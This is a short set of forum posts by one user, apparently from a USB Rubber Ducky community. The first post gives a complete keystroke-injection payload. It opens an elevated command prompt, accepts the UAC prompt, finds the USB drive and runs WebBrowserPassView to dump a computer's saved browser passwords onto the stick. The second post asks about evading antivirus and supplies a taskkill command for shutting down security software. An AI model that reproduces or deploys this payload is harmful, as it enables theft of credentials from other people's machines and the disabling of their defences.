Everything posted by Kietho
You need to use the /stext command in the cmd line like this: STRING start %DUCKYdrive%\Files\Webbrowserpassview.exe /stext %DUCKYdrive%\Passwords\%computername%\Passwords.txt But for that to work you need to find the assigned drive letter for your usb first, so it would look like this: DELAY 1000 WINDOWS D DELAY 250 WINDOWS r DELAY 250 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 1500 ALT y DELAY 250 BACKSPACE STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 500 STRING mkdir %duck%\Passwords\%COMPUTERNAME%\ ENTER STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:) DELAY 500 ENTER STRING set DUCKYdrive=%DUCKYdrive% DELAY 500 ENTER STRING mkdir %DUCKYDRIVE%\Passwords\%COMPUTERNAME%\ DELAY 500 ENTER STRING start %DUCKYdrive%\Files\WebBrowserPassview.exe /stext %DUCKYdrive%\Passwords\%computername%\Passwords.txt STRING exit DELAY 500 ENTER Just put your webbrowserpassview.exe in a foldar called Files on the usb and it should work if you put this payload on it.
Hello guys, I've got a question considering antivirusses blocking rubber ducky payloads. I see all these .exe payloads like chromepass.exe and wirelesskeyview.exe being used in rubber duckies. Doesn't the antivirus of the attacked PC block the .exe programs when they start running from cmd? Or will it just work normally? If that is the case, this script can disable Windows Defender easily. Most PCs dont have windows defender as the only protection tho, so it is needed to disable other antivirusses, right? Most antivirusses can be shut off with the taskkill command, i tried killing my MalwareBytes and it worked: (remove " ") taskkill /f /im "Insert antivirusprogram name here.exe" Can someone help me out with this? I want to know if im just being dumb here, since all of this might not be needed. Thanks in advance